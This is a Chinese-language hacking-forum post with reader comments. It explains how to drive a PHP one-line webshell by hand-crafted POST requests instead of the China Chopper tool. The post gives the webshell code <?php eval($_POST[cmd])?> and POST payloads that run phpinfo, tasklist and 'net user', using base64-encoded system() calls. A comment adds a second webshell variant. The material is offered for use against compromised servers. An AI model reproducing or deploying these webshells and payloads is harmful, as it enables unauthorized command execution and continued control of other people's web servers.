一句话脱离菜刀执行命令
是否还在当心菜刀有后门导致webshell被盗?一句话就一定要在菜刀里使用?当然不是,我们完全可以模拟post包来实现一句话的执行,方法如下:
1.假设一句话为:<?php eval($_POST[cmd])?>
2.执行phpinfo()时post提交:cmd=phpinfo();
执行tasklist时,post提交:cmd=$a=dGFza2xpc3Q;$b=base64_decode($a);system($b); (其中dGFza2xpc3Q为tasklist的base64编码,注意要删除后面的等号)
执行net user时,post提交:cmd=$a=bmV0IHVzZXI;$b=base64_decode($a);system($b);
3.其它的请自由发挥!!!
TCV=1
评论36次
原来还可以这样水,学xi了
这是常识。
菜刀只是为了提供一个便利,如果只需要执行命令的话用些命令函数也可以 比如: <?php system($_POST['cmd']);?>等等其他方式
菜刀用多了的后遗症
这不就是一句话的原理所在么...菜刀只是方便了很多,不用输那么冗长的命令而已....
好像抓包就是这个吧
难道不是常识吗。。。。。。
常识 好吧 居然还原创。。。。我曹
这确实是一个后门利用方法。。。。
火狐很牛逼啊
这确实是后门利用的常识 啊
传个文件 看看 还有没有选
大哥,看你原帖也不弱啊,这都发出来呀,看看发包内容就知道啦。。。。。。
工具党真忠诚到这种程度了已经。。。
.................我还以为这是常识
原来可以这样操作,涨知识了,谢谢楼主。
菜刀之前那些一句话html文件就是这样的。
这是常识。